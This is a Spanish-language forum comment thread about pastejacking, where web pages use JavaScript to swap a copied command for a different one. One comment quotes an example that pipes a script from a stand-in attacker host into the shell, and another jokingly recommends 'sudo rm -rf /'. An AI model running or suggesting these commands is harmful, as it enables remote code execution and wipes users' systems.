Portada
mis comunidades
otras secciones
![No copies y pegues comandos desde páginas web, te pueden hackear [ENG]](https://cdn.mnmstatic.net/cache/37/01/media_thumb_2x-link-3604803.jpeg?1641287346)
#6:
Curioso. Yo siempre pego primero en notepad++ pero solo porque es fácil copiar caracteres especiales invisibles por error y luego al pegar el comando no funciona y no tienes npi de por qué. Pero esta bien saber que es recomendable hacerlo siempre por seguridad también.
#28:
#26 Home meu yo cuando copio 1º leo lo que voy a copiar y luego copio y adapto lo que me obliga a volver a leer... lo cual a huevos te hace revisar en los dos puntos...
(por no hablar de que luego el codigo se prueba en DES y QAS antes y ya verias algo rarete, porque si, me averguenza admitirlo pero yo soy de esas nenazas que tiene entornos estanco de pruebas y desarrollo... es triste admitirlo pero me gano la vida así a base de vender mi dignidad con maquinas de pruebas que garantizen la seguridad)
(por no hablar de que luego el codigo se prueba en DES y QAS antes y ya verias algo rarete, porque si, me averguenza admitirlo pero yo soy de esas nenazas que tiene entornos estanco de pruebas y desarrollo... es triste admitirlo pero me gano la vida así a base de vender mi dignidad con maquinas de pruebas que garantizen la seguridad)
#2:
Pues adios a mi carrera 
Comentarios
Curioso. Yo siempre pego primero en notepad++ pero solo porque es fácil copiar caracteres especiales invisibles por error y luego al pegar el comando no funciona y no tienes npi de por qué. Pero esta bien saber que es recomendable hacerlo siempre por seguridad también.
#6 Puedes pegarlo también en la misma barra de direcciones del navegador, así no cambias de aplicación.
#6 Notepad++, sus opciones de edición con Regex incluidas y el plugin de Compare me ha salvado meses de trabajo.
Fan es poco.
#14 Notepad++ o #13 vim?
#24 Emacs!
Cuando no falla el arranque claro.
: Editor too big!
#24 Notepad++ en Windows y vim en Linux.
No siempre me dejan elegir S.O.
#14 El mejor editor de texto ever :-). Muy fan tambien.
#14 y desde hace varias versiones al cerrarlo no cierra los ficheros no guardados. Puede que sea el ptrograma que más tiempo me ahorra quitando el IDE.
#4 #7 #6 Entiendo que esto es pa la consola de comandos, porque al pegar lanza la ejecucion con lo que es un ataque a sysadmins y demás súcubos de averno. Los programadores de bien, los que dependemos de un compilador como que esto no afecta demasiado más allá de que home colega no puedes basar todo tu trabajo en copiar y pegar, tendrás que entender las instrucciones que estas pegando.
#15 Yo es que soy hombre orquesta. Lo mismo te programo un API que te lanzo un script en el servidor
#22 Ah pero picas el scritp en tu editor de referencia (los hombres de verdad lo dibujamos a raton alzado en el paint) y luego lo ejecutas, el proceso intermedio ya te protege contra estas mierdas que estan pensadas pa los que directamente copian y pegan en el terminal sin miedo a nada
#15 ¿Entender que?
En este caso hay dos variantes distintas... No saber lo que estás pegando pero que sea lo mismo que estás copiando. Y saber lo que estás copiando pero que no sea lo mismo que estás pegando
Saludos
#26 Home meu yo cuando copio 1º leo lo que voy a copiar y luego copio y adapto lo que me obliga a volver a leer... lo cual a huevos te hace revisar en los dos puntos...
(por no hablar de que luego el codigo se prueba en DES y QAS antes y ya verias algo rarete, porque si, me averguenza admitirlo pero yo soy de esas nenazas que tiene entornos estanco de pruebas y desarrollo... es triste admitirlo pero me gano la vida así a base de vender mi dignidad con maquinas de pruebas que garantizen la seguridad)
#28 Si hombre...y seguro que agendaras las intervenciones, avisarás a todos los grupos, pedireis backup y tendrás el rollback preparado. ¿Que te crees que estás en Linkedin?
Saludos
#44 E incluso hacemos planes de despliegue y se cumplen, e incluso si la funcionalidad es critica y gorda echamos a todos los usuarios y hacemos un freeze time hasta comprobar que todo esta perita y se documentan las pruebas (validadas por negocio) tanto en el jira asociado como en confluence
Puta locura oye lo de seguir el manual
#15 "no puedes basar todo tu trabajo en copiar y pegar"
Jajaja ya, cuéntame otra.
#36 Home sutil diferencia:
-Tu trabajo es copiar y pegar? Sip
-Tu trabajo consiste en copiar y pegar? Nop, tambien tengo que entender que copio, que pego y como lo adapto.
#37 Ya claro, y ahora me dirás que eres uno de esos gurús que aparte de copipastear de stackoverflow escribe su propio código
#41 lo tallo en tablillas de jade y nácar
#43 Me quedo flipao con la gente que copia código lo ejecuta directamente, cuando les planteas que antes que lanzar nada habrá que analizarlo, entenderlo y/o adaptarlo te miran raro....poco nos pasa.
#15 La versión para programadores de este ataque (muy similar vaya) se llama trojan source y creo que se publico hace no mucho en estas mismas páginas:
https://www.securityweek.com/trojan-source-attack-abuses-unicode-inject-vulnerabilities-code
Ahora fiate de servidores git públicos....
#15 si, si, se tienen que entender, y tal, pero copio, pego, y después cambiamos parámetros.....
Y si en alguna ocasión un trozo de código hace su magia y no consigo entender porqué.....pues igualmente lo dejo (pasa pocas veces! )
#6 jaja, si, el típico guion largo que te parece un guion normal
#81 Y las putas comillas, que hay como 5 tipos y según la fuente se distinguen o no: ", ', ` , ´, “, ”
Pues adios a mi carrera
#2 #3 #4 #5 Efectivamente no habéis leído nada ni os habéis enterado de qué va el articulo.
El ataque es que mediante javascript en la pagina tu crees que estas copiando un texto como 'sudo apt upgrade' cuando en realidad estas copiando 'curl http://attacker-domain:8000/shell.sh | sh'
#8 Por eso #3 dice depende de la fiabilidad de la fuente. Por ejemplo sabes que en StackOverflow eso no va a pasar.
En cualquier caso, la verdad es que es algo que nunca he tenido en cuenta, y lo pasaré por un editor de texto antes cuando la fuente no es conocida.
#23 Que no ha pasado no significa que no vaya a pasar. Cualquier día hacker malicioso se hace con el control de cualquier CDN de esas en las que todo el mundo confía o con el control de ajax.googleapis al que mucha gente invoca para usar jquery. Quizás tarden cinco minutos en arreglarlo, pero las consecuencias pueden ser desastrosas.
#45 Hombre, pues claro. Y lo mismo un día sales de casa y te atropella un camión.
Está claro que todo lo que hagas en Internet tiene cierto riesgo. Todo. Por un lado u otro te pueden joder, o hackear un sitio, o una fuente de datos o el camino hacia ellos... Pero la probabilidad de que pase, de que te pille en medio y, además, el daño que te haga sea grande pues es menor. Si usas GoogleApis pues es menor que si usas fulanitoApis.
(Desde luego que las precauciones en general hay que tenerlas. Porque nadie pensaba que iba a arder el puto OVH entero y ahí está, chamuscao)
#45 me da la sensación que antes hackean tu hosting compartido de dos duros que un CDN ofrecido por una grande
#52 Por supuesto. Pero esto se está intentando. Un colega que se dedica al análisis forense estuvo investigando ataques contra una compañía de publicidad online española. No es ninguna de las grandes como Google Adwords.
#52 creo que ya ha pasado, alguna vez han colado malware en CDNs
#8 Si la he leído, y es bastante interesante.
Sobre lo de copiar de fuentes fiables que comenta #3, cualquier sitio puede haber sido crackeado y aunque suela ser un sitio de confianza puede que un día en concreto no lo sea.
La altenartiva de pegar en un editor de texto es la mejor opción, pero, siendo sinceros, nadie la hace ni la va a hacer salvo que estos ataques se vuelvan demasiado frecuentes.
#8 Yo tengo la costumbre de hacer un diario de todos los servidores que monto o de los problemas raros que soluciono para tenerlo todo documentado.
Me apoyo en un TXT donde primero copio los comandos y luego los ejecuto en el equipo así que sería raro que me la pegasen, también hay que entender lo que se está haciendo, claro.
Pero, aunque ya lo había leido antes, me ha venido bien para reafirmarme en esta práctica de pasar antes por un TXT y luego ejecutar.
#2. Copia primero en un editor de texto para comprobar lo que explica #8. El problema es que el propio pegado incluye la ejecución con un "return" a través de un cambio de linea :
'...Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it. This means the above example would execute as soon as it's pasted directly into a Linux terminal...'
Es decir, lo que pegas no solo lo pegas, también lo ejecutas con el propio pegado en la terminal Gnu/Linux.
#7 #8 #87 Precisamente lo que digo es que ni soy programador, ni soy administrador de sistemas, ni investigador de seguridad ni aficionado a la tecnología hasta el punto de trabajar con comandos. Soy windowsero de puntero e icono. El único "comando" que ejecuto muy rarísimamente es el "config". 😋
#89 Yo no he dicho lo que no sé o no sé. Pero copiar un comando (por mil razones) de una web es de lo más normal.
Por cierto, no habla de copiar código, sino comandos, pero tú a lo tuyo.
Insisto, había dos opciones con tu comentario...
#90 Copiar un comando o fragmento de código de una fuente externa es normal, ejecutarlo sin entenderlo primero o probarlo y confirmar que es válido para tu sistema eso no es lo normal y si te dedicas profesionalmente a ello, apaga y vamonos.
#94 Paso de ti. Anda, léelo, sigues discutiendo sin haberlo leído y entendido el problema.
#96 Yo lo he entido perfectamente. Lanzar comandos que te has copiado y pegado en un texto y no has analizado antes de ejecutar, por que ahí ves que lo que supuestametne has copiado no es lo que tienes delante, y lo has pegado directamente lanzandolo en la ventana de comandos, o en un tu entorno de ejecución. A mi me está quedando muy claro lo que eres tu.
#99 Un ejemplo (puede haber otros muchos): conoces el comando, pero te falta una opción, incluso al verlo la recuerdas; ya está analizado; por tanto, lo copias y lo pegas.
A mí ya no me queda tan claro lo tuyo; seguramente sea la mezcla de ambas cosas.
Este es tu inicio, no pierdas la perspectiva:
Quien haga esto, se merece que lo hackeen sin duda alguna.
#114 no quedes tu como un idiota por no leer #99
#94 Tío... No se qué quieres demostrar, lo normal es ser un mono que pulsa teclas sin saber que coño hace. Y dices que tienes mucha experiencia en el sector?
#c-29" class="content-link" style="color: rgb(227, 86, 20)" data-toggle="popover" data-popover-type="comment" data-popover-url="/tooltip/comment/3604803/order/29">#29 La fuente original recomienda escribir el carácter "#" antes de pegar, de esta forma si se ejecuta automáticamente, el sistema lo entiende como un comentario y no hace nada.
cc #21
#c-35" class="content-link" style="color: rgb(227, 86, 20)" data-toggle="popover" data-popover-type="comment" data-popover-url="/tooltip/comment/3604803/order/35">#35 Añadir un # al principio no sirve de nada si el contenido cuenta con varias líneas con salto de línea al final, pues sólo evitará la ejecución de la primera línea.
CC #29
#47 Bien visto
#47 Aparte de que si prolifera el uso de almohadillas, empezarán a poner saltos de carro como primer caracter.
#c-47" class="content-link" style="color: rgb(227, 86, 20)" data-toggle="popover" data-popover-type="comment" data-popover-url="/tooltip/comment/3604803/order/47">#47 pues en vez de # al comienzo pones una línea:echo
#62 Ostra, por lo que se vé a menéame no le gusta los <
#62 Una línea "HERE DOCUMENT", joder, menéame, qué pesado eres.
#21 #29 tengo la mala costumbre de ir documentando en ficheros de texto así que nunca va a consola directamente.
#55 Seguramente es la opción más sensata.
#0 Parece que hace tiempo que se viene hablando de ello ...
https://security.stackexchange.com/questions/39118/how-can-i-protect-myself-from-this-kind-of-clipboard-abuse/52655#52655 y hay protección
No sé rick, a mi desde Firefox me copia bien, parece que no afecta a Firefox. Lo he probado en chrome y efectivamente se puede cambiar el portapapeles.
Por otro lado, me parece de risa que una web puede alterar tu portapapeles sin tu consentimiento.
RIP Chromium users.
#31 Con Firefox me pasa tambien. Tienes desactivado el JS o alguna extension que controle el JS?
La funcion de copiar en el portapapeles es gracias al JS.
#50 Tengo activado JS, pero en su día seguí un tutorial que te ponía firefox tocho, todo muy "privado", yo por ejemplo si cierro todas las pestañas de meneame y lo vuelvo a abrir, ya no estoy logueado, tengo que loguearme de nuevo. Algunas funciones de 3D tampoco me funcionan en firefox.
Revisando el tutorial, veo que la línea en concreto es esta:
dom.event.clipboardevents.enabled = false
Hay que cambiarla en about:config.
Por si a alguien le interesa:
https://restoreprivacy.com/firefox-privacy/
Es muy incómodo al principio, pero se puede vivir con ello y te aporta mucha más privacidad y seguridad que la configuración por defecto.
#53 échale un ojo a #61 que igual te interesa
#50 A mi con Firefox en Ubuntu tampoco me pasa (con uBlock y Privacy badger). He tenido que hacerlo con Chrome para ver el efecto.
#31 A mí me funciona en Firefox 95.0.2, así que habrá que tener cuidado por si acaso.
Normalmente si copio y pego algo es que se que estoy haciendo y he ido a mirar exactamente como poner los parametros o así…
Quizas el peligro sería copiar un comando de instalación una aplicación con un comando que apunte a una versión “alternativa” de ella, así que hay que vigilar de donde obtienes esas instrucciones.
#4 #5 La cosa es que lo que copies de la web X ,no tiene porqué ser lo que pegues en tu línea de comando y puede que incluso se autoejecute.
Por eso se suele recomendar pegarlo en un bloc de notas antes
Saludos
#3 #4 En el artículo explica que no es que no sepas qué hace el comando en cuestión, si no que con un script la página te cambia el contenido del texto que copias por otro totalmente diferente, añadiendo un al final, con las consecuencias que esto puede tener. (O sea, que ejecutes en consola cualquier cosa que quiera el "atacante").
#17 Gracias. No lo había entendido o estaba durmiendo o estoy ya mayor.
#4 Quizás la noticia explica cuál es el peligro.
#4 Tal como explica el artículo, te meten un salto de línea al final con lo que solo pegarlo en la consola se puede ejecutar. Además, con javascript, consiguen que el texto que copias realmente no sea el mismo que lees en la web donde lo copias.
Por algo la genial app 'Windows Terminal' advierte siempre que pegas un comando que incluye fin de línea.
Curaos en salud y pegad siempre antes en vuestro editor de texto favorito (vim) y revisad.
Quien no usa el Notepad es un parguela
"Se advierte a los programadores, administradores de sistemas, investigadores de seguridad y aficionados a la tecnología que copian y pegan comandos de páginas web en una consola o terminal que corren el riesgo de que su sistema se vea comprometido."
Y aquí he dejado de leer. No porque no esté de acuerdo con el artículo, sino porque no soy ninguna de esas cosas. Si copio algo en internet es o bien texto, o bien una dirección de página web.
#5 Claro, dejas de leer y no te enteras. Precisamente ocurre al copiar un texto con un comando.
El truco de toda la vida: pegas primero en el bloc de notas y a tomar por culo el formato. Luego ya, copias y pegas sólo lo que quieres.
Vamos a ver. Dependerá de la fiabilidad de la fuente y de emplear un poco el cerebro para saber qué es lo que hace el comando que estés copiando. Si no fuera por la wiki de Arch, no podría ni haber instalado el SO.
No soy informático, como muchos por aquí.
#3 alguien que no ha leído el artículo. Lo que dice es que lo que la página web envía al portapapeles no tiene por qué ser lo que copiaste, así que puedes copiar un comando inocuo y cuando lo pegas, que sea un comando distinto (y con un salto de línea al final para que se ejecute)
#9 Lo suyo es utilizar una consola que cuando pegas algo con un salto de línea, te muestre un popup de confirmación con el texto que vas a a pegar.
#21 ¿Sabes si eso se puede configurar en el terminal de gnome? ¿me puedes recomendar alguna consola más segura?
Gracias
#29 Ni idea, pero me imagino que alguna opción habrá.
Yo es que para trabajar estoy obligado a utilizar Windows, así que utilizo Mobaxterm y desde ahí conecto a las máquinas de Linux.
#29 Curiosamente lo hace la Windows Terminal. La vengo usando desde hace unos meses con un Ubuntu instalado en Win10. Si pegas contenido con un salto de línea te lo muestra y te pregunta si estás seguro porque podría ser dañino.
Anda que no habré metido veces la pata al meter código de portapapeles que contenía otra cosa distinta a lo que creía (por haber seleccionado un texto sin darme cuenta)
#56 Acabo de pegar en la consola por error un log de 200 líneas
#68 Te aseguro que no eres el primero
(obviamente uno de apache no debería dar problema)
Y te imagino buscando a ver si por un casual alguno de ellos pudiera constituir un comando que se pudiera haber ejecutado
#69 Era un log de correo, así que aparte de borrarme el historial de comandos no ha pasado nada, pero cuando te pasas medio día copiando y pegando cosas entre consolas suele ser muy normal pegar lo que no debes y que creías que habías cambiado en el portapapeles por otra cosa.
Ayer mismo entre "cp" por aquí "rm" por allá me cepillé un fichero que no debía. Menos mal que era una tontería prescindible.
Lo de pedir confirmación al pegar varias líneas en la consola parece que sería una característica útil
#71 Pues acabo de probar esto ....
https://cirw.in/blog/bracketed-paste
https://unix.stackexchange.com/a/600641
Establecer en
~/.inputrc
set enable-bracketed-paste on
No lo conocía, y no está mal ... Al menos te da tiempo a rectificar
#78 Lo iré probando, porque parece que funciona. También en Ubuntu parece que es el modo por defecto, aunque no veo dónde está configurado, porque veo que se comporta igual sin ponerlo
#68 Mientras no te olvides de poner el where en el delete from, todo ok
#91 Eso creo que no me ha pasado en la vida, pero nunca he entendido como algo tan peligroso no lo remediaron en el primer diseño que hicieron del SQL. Supongo que antes, por las restricciones de hardware que se tenían, y que normalmente la gente sabía lo que se hacía, no le daban importancia
#95 A mi me ha pasado dos veces, pero con el UPDATE y en una BD de desarrollo (bien) pero con auto-commit (mal) ¯_(ツ)_/¯
#95 Infinidad de veces hice a drede delete sin where, porque habrían de quitarlo?
Y no me sirve el truncate porque de esa forma no corren los triggers.
#56 cierto, recuerdo desactivarlo. Y si, me gusta vivir peligrosamente
#29 El terminal de xfce lo hace automáticamente.
Edito: por lo menos en manjaro.
#9 lo dicho. Qué no me he enterado de nada cuando lo he leído. Gracias.
#3 Ahí está, esa es la clave, yo el comando que siempre me soluciona todo y que recomiendo a todo el mundo es
$sudo rm -rf /
...y adiós problema
#20 El archivo .bashrc tiene un alias que activa siempre el parámetro -i en rm, entiendo que es como una salvaguarda.
Leer antes de pulsar el enter.
E incluso, pegarlo en tu editor de texto antes de cualquier cosas.
E incluso mejor, entender que estas leyendo y escribirlo tu a manita.
Recordad amigos, nunca naveguéis sin NoScript.
#18 Vieeeeeeejuuuunnooooooooooooo!!!
Lo peor de todo es que probablemente también uses Ublock Origin. Con esa extensión no hacen falta los deshabilitadores de JS.
#39 https://emojipedia.org/person-shrugging-medium-light-skin-tone/
#39 Ublock Origin funciona con listas negras, así que no va a filtrar javascript malicioso externo que va cambiando dominio o IP, que es lo que hacen los ciberdelincuentes
Lo único que te protegerá son extensiones bloqueadoras con listas blancas, como NoScript o uMatrix... la pega es que rompen webs con gran facilidad (especialmente uMatrix sigue rompiendo ciertas webs incluso tras darles permisos totales)
Lo ideal sería que los navegadores y empresas estandarizadoras se pusieren a crear un sistema de permisos para JS, para impedir usos abusivos o maliciosos (el acceso al historial y portapapeles) salvo en escenarios seguros o previa autorizacion del usuario.
#64 Permite que diga: pero qué pollas estás diciendo?!
#98 Te lo deletreo:
abnog recomienda usar noscript, una extension de seguridad que bloquea todos scripts salvo los de los dominios que autorices (listas blancas)
-La noticia habla de los riesgos de copiar y pegar comandos porque un javascript malicioso podría alterar lo copiado e insertar comandos peligrosos
-
-Tu le llamas Vieeeeeeejuuuunnooooooooooooo y argumentas que aquello es innecesario si tienes Ublock (un bloqueador de publicidad con filtros, listas negras de scripts)
-Yo replico que no, que ublock y similares apenas protegen contra javascripts maliciosos porque el sistema de listas negras no protege de amenazas desconocidas: Hay filtros, listas negras, centrados en bloquear malware, pero tardan en actualizarse y en seguida quedan desfasadas, así que los malos van 10 pasos por delante.
...Por lo tanto, siendo necesario una extension lo que lo bloquee todo salvo las excepciones, las listas blancas, como Noscript y uMatrix. Y finalmente pido a los navegadores que pongan limites al javascript web para evitar ataques como este
Borrado!
borrado... sorry!
Ya claro y qué va a ser lo próximo? No utilizar stackoverflow? Y COMO TRABAJO??
No uséis el copiar y pegar.
Repito, no uséis el copiar y pegar.
Lo digo de nuevo, no uséis el copiar y pegar.
No uséis el copiar y pegar.
y si copias, no te olvides de copiar también el where del delete from
Que JavaScript pueda modificar el contenido del portapapeles es para hacérselo mirar. Supongo que está definido en el estándar y lo implementan todos los navegadores. Yo tenía a la gente que define el estándar por genios, pero tendré que replanteármelo.
Quien haga esto, se merece que lo hackeen sin duda alguna.
#1 No sé si vas de prepotente o tienes ni puta idea...
#86 A ver si el que no tiene ni puta idea eres tu aparte de demostrar tu falta de profesionalidad. Quien ejecute código en sus sistemas, que ha cogido de una web y no lo haya revisado previamente para entender lo que hace antes de lanzarlo, merece lo que le pase y así aprenderá.
#89 No te leíste el artículo. Por favor léelo porque sino quedas en ridículo.
#1 Pa eso están los backups diarios.
No hay tiempo material para desarrollar todo el código desde cero. Siempre vas a tener que copiar y pegar algo, tirar de librerías, etc.
#10 meneame es tu lugar, pequeño padawan.
No pienso pasar por un block de notas todos los comandos que robo de stack overflow. Mi productividad se iría al traste. Prefiero jugarmela.
#75 Si haces +a, +c en Stack Overflow y +v en Notepad++, puedes tener todo el Stack Overflow en un txt.
#88 Si claro, sin el formato ni los estilos asociados. A ver quien encuentra algo ahi.